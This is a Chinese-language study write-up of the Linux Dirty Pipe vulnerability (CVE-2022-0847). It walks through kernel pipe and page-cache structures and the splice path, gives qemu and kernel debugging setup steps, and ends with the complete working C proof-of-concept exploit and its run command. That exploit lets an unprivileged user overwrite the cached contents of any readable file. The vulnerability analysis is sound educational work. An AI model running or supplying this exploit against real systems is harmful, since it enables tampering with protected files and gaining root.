CVE-2022-0847-DIRTY-PIPE-detail

# basic

(之后会把 docker 做好传上去 以后就不用折腾了 QAQ)
https://hub.docker.com/repository/docker/squirre17/dirtypipe

# page cache

Linux 对文件的写入依赖页缓存(page cache)的回写机制:写文件时先写内存中的缓存页并把它标记为脏页,之后由内核在回写(writeback)时统一写回磁盘,而不是每次写都直接写磁盘。
在打开文件的时候可以用 O_DIRECT | O_SYNC 标志改用同步直写策略,让写入尽量绕过页缓存并同步落盘。
但这里并不是对文件进行硬存级别的篡改,假设文件进了内存,然后我修改了这个文件内存中的部分内容,短时间再次访问这个文件会直接从内存缓存中拿到我们篡改过的内容而不是去 disk 上取。

# structs

# file

fs.h - include/linux/fs.h - Linux source code (v5.13-rc1) - Bootlin
每一个打开的文件描述符都对应一个 struct file

  • pipe_inode_info 指向一个内核管道
1
2
3
4
5
6
7
8
9
10
11
/*
 * Abridged excerpt of struct file, the kernel object behind an open file
 * descriptor. Lines consisting of "..." mark members omitted by the article.
 */
struct file {
...
struct path f_path;
struct inode *f_inode;
const struct file_operations *f_op;
...
struct address_space *f_mapping; /* describes where the file's contents are mapped */
...
/*
 * NOTE(review): the other excerpts in this document attach the pipe with
 * inode->i_pipe (get_pipe_inode) and fetch it with filp->private_data
 * (pipe_write), which suggests i_pipe is a member of struct inode rather
 * than struct file -- confirm against include/linux/fs.h.
 */
struct pipe_inode_info    *i_pipe;
...
};

其中的 address_space 指示了这个文件内容的映射位置

# address_space

address_space 的作用就是将文件在磁盘上的数据以 page 的方式连续地呈现出来, 这样读取文件的操作便转换成了先将不连续的磁盘上的内容读取到 page 中, 再从连续的 page 中去读取连续的数据。

  • i_pages: 缓存页组 (是一个 XArray,即 eXtensible Array)
  • nrpages: 缓存页 (page entry) 的数量
  • a_ops: 记录着对这个文件进行操作的虚表方法 (glibc 打 io 或者内核打 ptmx 类似)
1
2
3
4
5
6
7
8
9
10
/*
 * Abridged excerpt of struct address_space, which presents a file's contents
 * as a set of cached pages. Lines consisting of "..." mark omitted members.
 */
struct address_space {
struct inode *host;
struct xarray i_pages; /* XArray holding the cached pages */
...
unsigned long nrpages; /* presumably the number of cached page entries -- confirm against fs.h */
pgoff_t writeback_index;
const struct address_space_operations *a_ops; /* table of operations for this mapping */
unsigned long flags;
...
}

# xarray

xarray 指向了多个 page 结构体,也就是这个文件的内容缓存在哪几页。(xa_head 是一个受 RCU 保护的指针,指向 XArray 内部树结构的根节点或唯一的条目;__rcu 只是给静态检查工具用的标注,并不表示这里是链表)

1
2
3
4
5
6
/*
 * Head of an XArray. In this document it appears as address_space.i_pages,
 * i.e. the container through which a file's cached pages are found.
 */
struct xarray {
spinlock_t xa_lock; /* presumably serialises modifications of the array -- confirm */
/* private: The rest of the data structure is not to be used directly. */
gfp_t xa_flags;
void __rcu * xa_head; /* __rcu-annotated pointer to the array's contents */
};

# pipe_inode_info

在 file 里的内核管道

  • head 指向生产者 buffer
  • tail 指向消费者 buffer
  • bufs 由若干 pipe_buffer 组成的环形数组(是数组,不是链表)
    这里的 ring_size 默认会被设置为 16 也就是有 16 个循环 buf 供 pipe 使用
    然后 head 和 tail 是用于在 bufs 中做索引的
    例如 &pipe->bufs[(head - 1) & mask]; 这里的 mask 就是 ring_size - 1.
    内核默认会为一个 pipe 分配 16 个 pipe_buffer,构成循环缓冲区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Abridged excerpt of struct pipe_inode_info, the kernel-side state of one
 * pipe. "(···)" marks members omitted by the article.
 */
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head; /* producer index; pipe_write fills bufs[head & mask] and then advances it */
unsigned int tail; /* consumer index; compared with head by pipe_empty()/pipe_full() */
unsigned int max_usage;
unsigned int ring_size; /* number of slots in bufs; ring_size - 1 serves as the index mask */

(···)

struct pipe_buffer *bufs; /* array of pipe_buffer slots used as a ring */
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};


(图片来源 breeze 💐)

# pipe_buffer

每一个 buffer 指向一个 page

1
2
3
4
5
6
7
/*
 * One slot of a pipe's buffer ring. Each slot refers to a single page.
 */
struct pipe_buffer {
struct page *page; /* page that holds this slot's data */
unsigned int offset, len; /* start of the data inside the page, and its length in bytes */
const struct pipe_buf_operations *ops; /* e.g. anon_pipe_buf_ops or page_cache_pipe_buf_ops */
unsigned int flags; /* PIPE_BUF_FLAG_* bits such as PIPE_BUF_FLAG_CAN_MERGE */
unsigned long private; /* NOTE(review): not used by any excerpt in this document */
};

page 结构体

1
2
3
4
5
6
7
8
9
10
/*
 * Abridged excerpt of struct page, the descriptor that pipe_buffer.page
 * points at. Lines consisting of "..." mark omitted members.
 */
struct page {
unsigned long flags;
...
/* Page cache and anonymous pages */
struct address_space *mapping;
pgoff_t index; /* Our offset within mapping. */
...
void *virtual; /* Kernel virtual address (NULL if
not kmapped, ie. highmem) */
}

# inode

在 file 的结构体中可以看到 每一个文件都有 inode (这是文件系统的管理方式),对于管道,也有自己的 inode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * Abridged excerpt: allocate a pseudo inode on pipe_mnt's superblock and
 * attach a freshly allocated pipe_inode_info to it. The remaining
 * initialisation, the return statement and the fail_* labels are elided by
 * the article ("(···)").
 */
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

if (!inode)
goto fail_inode;

inode->i_ino = get_next_ino();

pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;

inode->i_pipe = pipe; // the inode now refers to the pipe
pipe->files = 2; // number of struct file referring this pipe (protected by ->i_lock)
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipefifo_fops;

inode->i_state = I_DIRTY;

(···)
}

关于 pipe 的创建

  • 申请了一个 pipe_inode_info 结构体
  • 申请了多个 buf,但是只返回一个指向这多个 buf 的头指针,相当于在一个定长数组上用 head 和 tail 两个下标实现的循环队列 (数据结构学过的队列那块)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * Abridged excerpt: allocate a pipe_inode_info together with its ring of
 * PIPE_DEF_BUFFERS pipe_buffer slots and return it. Accounting checks and
 * the failure path are elided by the article ("(···)").
 */
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

(···)

/* kcalloc returns zeroed memory, so every slot's flags field starts at 0 */
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
/* the ring size and the usage limit both start at the default slot count */
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

(···)
}

# iov_iter

iov_iter 是内核对一段数据缓冲区的统一迭代器封装,最初用于处理用户传入的用户态缓存 (iovec),同样也可以封装一个 pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Abridged excerpt of struct iov_iter. For a pipe-backed iterator the
 * union's pipe member names the target pipe (copy_page_to_iter_pipe reads
 * it as i->pipe). "(···)" marks members omitted by the article.
 */
struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type;
size_t iov_offset;
size_t count;
union{
(···)
struct pipe_inode_info *pipe;
};
(···)
};

在这里只用到了一个 pipe 对象 (也就是 pipe 对象由 iov_iter 进行管理或者说是更外一层的封装)。
在 PoC 中,splice 最终由 copy_page_to_iter_pipe 函数把文件的页缓存页 (page) 直接挂到 iov_iter 所指向的 pipe 上(只是让 pipe_buffer 引用该页,并不拷贝数据)

# demo

1
echo "AAAAAAAAAA" > foo
1
2
3
4
5
6
7
8
9
10
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
/*
 * Demo loop: forever splice 2 bytes from stdin to stdout, then write the
 * 5-byte marker "BBBBB" to stdout. Return values are deliberately ignored,
 * and the loop never terminates on its own.
 */
int main(int argc, char **argv) {
    static const char marker[] = "BBBBB";

    while (1) {
        /* fd 0 -> fd 1, no explicit offsets, 2 bytes, no flags */
        splice(STDIN_FILENO, NULL, STDOUT_FILENO, NULL, 2, 0);
        write(STDOUT_FILENO, marker, sizeof(marker) - 1);
    }
}
// ./splicer <foo |cat >/dev/null

# environment

# docker

拉下 ubuntu20, 换个源先

1
2
sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list
apt-get update && apt-get -y dist-upgrade

启动 docker 的时候千万要注意!!

  • 增加 SYS_PTRACE(打开调试)
  • 增加端口映射(这样才能让外部主机连上 gdb)
1
docker run -it --name=mdp1 --cap-add=SYS_PTRACE -p 1234:1234 my_dirty_pipe:1.0 /bin/bash

# other tools

1
2
3
4
alias agi="/bin/apt-get install -y"
agi vim gdb gdbserver wget make gcc flex bison bc git cpio ninja-build pkg-config automake libtool
agi libncurses-dev openssl libssl-dev dkms libelf-dev libudev-dev libpci-dev libiberty-dev autoconf libglib2.0-dev
agi libpixman-1-dev python

# qemu

一个报错的解决文档 QEMU contribution - HackMD

1
2
3
4
5
6
wget https://download.qemu.org/qemu-6.2.0.tar.xz
tar xf qemu-6.2.0.tar.xz && cd qemu-6.2.0 # unpack the tarball and enter the source tree (otherwise ../configure does not exist)
mkdir build && cd build # out-of-tree build directory; configure is run from inside it
# everything below runs inside qemu-6.2.0/build
../configure
make # compile the sources
make install # install

这得老半天了

# Linux

选用 v5.13-rc1 版本

1
2
3
4
wget https://github.com/torvalds/linux/archive/refs/tags/v5.13-rc1.tar.gz
tar xf v5.13-rc1.tar.gz && cd linux-5.13-rc1 # unpack the tarball and enter the kernel tree before running make
make menuconfig
cat /proc/cpuinfo| grep "cpu cores" | uniq # check cpu core counts
make bzImage -j"$(nproc)" # one job per available CPU instead of a hard-coded 4

扣 y 选中

1
2
3
4
5
6
7
kernel hacking ->compile-time checks and compiler opt -> compile the kernel with debug info
-> Provide GDB scripts for kernel debugging
-> Generate readable assembler code
kernel hacking -> compile the kernel with frame pointers (没找到)
kernel hacking -> Generic Kernel Debugging Instruments -> KGDB: kernel debugger ->
KGDB: use kgdb over the serial console (NEW)

然后记得保证以下几个也打开了

1
CONFIG_DEBUG_INFO_DWARF4=y

然后随便找个 ctf 的文件系统就行 或者 busybox 编译。

1
2
cpio -idmv < ../rootfs.img #解包cpio
find . | cpio -o --format=newc > ../rootfs.img #打包cpio
1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 256M \
-kernel ./arch/x86/boot/bzImage \
-initrd ./rootfs.img \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
-cpu qemu64 \
-nographic \
-net nic,model=virtio \
-net user \
-s \
-S

# 静态分析

# splice 函数

在两个 fd 中移动数据 为零拷贝操作
比如要实现 fp1 到 fp2 的数据拷贝 正常来说是要经历 kernel space -> user space -> kernel space
用 splice 就可以变成 fp1 -> pipe_read -> pipe_write -> fp2

将 fd_in 传递到文件描述符 fd_out,其中文件描述符之一必须引用管道。
splice  的零拷贝方法就是,直接用文件缓存页来替换 pipe  中的缓存页 (更改 pipe 缓存页指针指向文件缓存页)。
也就是实际上不需要经过把我们的输入拷贝到 pipe 这一步,直接把我们数据的缓存页的位置给到需要用到这个的 fd 就行了。(因为 pipe 就是一端写入一端读入,我如果把文件内容写入管道缓冲区,然后再从管道缓冲区写出,不如在管道缓冲区的时候直接让 buffer 的 page 指向原来那个页的内存缓存页,这样就少了 copy 那一步)

1
2
ssize_t splice(int fd_in, loff_t *off_in, int fd_out,
loff_t *off_out, size_t len, unsigned int flags);
  • If fd_in refers to a pipe, then off_in must be NULL
  • If fd_in does not refer to a pipe and off_in is NULL, then bytes are read from fd_in starting from the file offset, and the file offset is adjusted appropriately.

splice 最终会调用 copy_page_to_iter_pipe 函数
而这个函数并没有初始化 buf->flags,所以该 pipe_buffer 上残留的 PIPE_BUF_FLAG_CAN_MERGE 不会被清除
iov_iter 携带了我们写入的那个管道 而这个管道的头部 buf 被指向了我们送入的第一个参数 page,这个 page 是内存缓存页的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * Abridged excerpt: make the pipe slot at the iterator's head refer to the
 * caller's page instead of copying the data. "(···)" marks code omitted by
 * the article. Returns the number of bytes accounted for (bytes).
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

(···)

buf = &pipe->bufs[i_head & p_mask];

(···)

/*
 * Key point: the slot receives the page-cache ops table and the caller's
 * page, but no assignment to buf->flags appears in this excerpt, so the
 * slot keeps whatever flags it carried from its previous use.
 */
buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;/* the slot now references the page-cache page directly; nothing is copied */
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

# pipe_write 分析

利用的点是:pipe_write 在为写入启用一个新的 pipe_buffer 时(非 packet 模式下)会默认把 flags 设置为 PIPE_BUF_FLAG_CAN_MERGE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

(···)

head = pipe->head; // 获取头结点 head是int类型
// pipe是循环链表结构 如果head == tail 代表空了
was_empty = pipe_empty(head, pipe->tail);
// chars就是数据长度
chars = total_len & (PAGE_SIZE-1);

/* 如果有长度且管道不为空 */
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
// buf指向管道的缓冲区
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

/* ☆ 此处重点 ☆
如果flags标志位为 PIPE_BUF_FLAG_CAN_MERGE
并且当前buf已经写过的offset加上即将写的chars的大小小于PSIZE
就会继续写
*/
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
// 验证数据存在 和IO阻塞相关 返回0代表正常
ret = pipe_buf_confirm(pipe, buf);
(···)

// 此函数就是往管道的buf所在的页写数据了 如果写了之后会直接go out 不会走下面的for(;;)
ret = copy_page_from_iter(buf->page, offset, chars, from);
(···)

buf->len += ret;
(···)
}
}

// 上一页不能接着写的情况 就是本应该走的正常情况
for (;;) {
(···)

head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

// 重新申请一个page
if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);

(···)

pipe->tmp_page = page;
}

spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
/* 重点 初始化阶段 */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else// ☆ 默认设置flag为 PIPE_BUF_FLAG_CAN_MERGE
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
(···)
}

# POC 分析

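  • 作者首先写满了 pipe 的全部 16 个 pipe_buffer,使每个 buffer 的 flags 都被 pipe_write 设置为 PIPE_BUF_FLAG_CAN_MERGE
  • 然后把数据全部读出 清空 pipe(buffer 被释放,但 flags 仍然保留)
  • 用 open 打开对应文件,只读即可 之后 splice 读取时文件内容就位于缓存页里了
  • splice 系统调用将对应的管道的 buf 和文件缓存页绑定在一起
  • 利用 splice 路径 (copy_page_to_iter_pipe) 不初始化 buf->flags、PIPE_BUF_FLAG_CAN_MERGE 因而残留的特性 继续往管道里写入 就写入到了对应的文件缓存页
    这就造成了一个可以改写任意可读文件(页缓存内容)的漏洞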
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 *
 * On return p[0] is the read end and p[1] the write end of an empty pipe.
 * Any failure while creating, sizing, filling or draining the pipe aborts
 * the process: carrying on with a half-prepared pipe could block forever
 * or leave the flags unprepared.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    /* fcntl() reports failure as -1; never let that wrap into a huge
       unsigned size, which would make the fill loop block on a full pipe */
    const int pipe_capacity = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_capacity <= 0) abort();

    const unsigned pipe_size = (unsigned)pipe_capacity;
    static char buffer[4096];

    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        const ssize_t written = write(p[1], buffer, n);
        if (written <= 0) abort();
        /* count what was really transferred, not what was requested */
        r -= (unsigned)written;
    }

    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        const ssize_t drained = read(p[0], buffer, n);
        if (drained <= 0) abort();
        r -= (unsigned)drained;
    }

    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

/*
 * Usage: PROGRAM TARGETFILE OFFSET DATA
 *
 * Validates that DATA fits inside TARGETFILE at OFFSET without starting on
 * or crossing a page boundary, opens the file read-only, prepares a pipe
 * with prepare_pipe(), splices the single byte preceding OFFSET into the
 * pipe and finally writes DATA to the pipe. Returns EXIT_SUCCESS when every
 * step succeeds, EXIT_FAILURE (after a message on stderr) otherwise.
 */
int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* positional arguments; no validation beyond what follows */
    const char *const target = argv[1];
    const char *const payload = argv[3];
    const size_t payload_len = strlen(payload);
    const loff_t offset = strtoul(argv[2], NULL, 0);

    /* one byte before the offset must live in the same page */
    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t page_end = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t write_end = offset + (loff_t)payload_len;
    if (write_end > page_end) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* read-only access to the target is sufficient */
    const int file_fd = open(target, O_RDONLY);
    if (file_fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat info;
    if (fstat(file_fd, &info) != 0) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > info.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (write_end > info.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    /* pipe whose slots all still carry PIPE_BUF_FLAG_CAN_MERGE */
    int pipe_fds[2];
    prepare_pipe(pipe_fds);

    /* splice the byte just before the requested offset into the pipe, so
       that the pipe slot references the file's page-cache page while its
       stale PIPE_BUF_FLAG_CAN_MERGE flag stays in place */
    loff_t splice_from = offset - 1;
    const ssize_t spliced = splice(file_fd, &splice_from, pipe_fds[1], NULL, 1, 0);
    if (spliced < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (spliced == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* because of the flag this write is merged into the spliced page
       rather than going to a fresh pipe_buffer */
    const ssize_t written = write(pipe_fds[1], payload, payload_len);
    if (written < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)written < payload_len) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}

1
2
gcc exp.c -o exp --static
./exp file offset string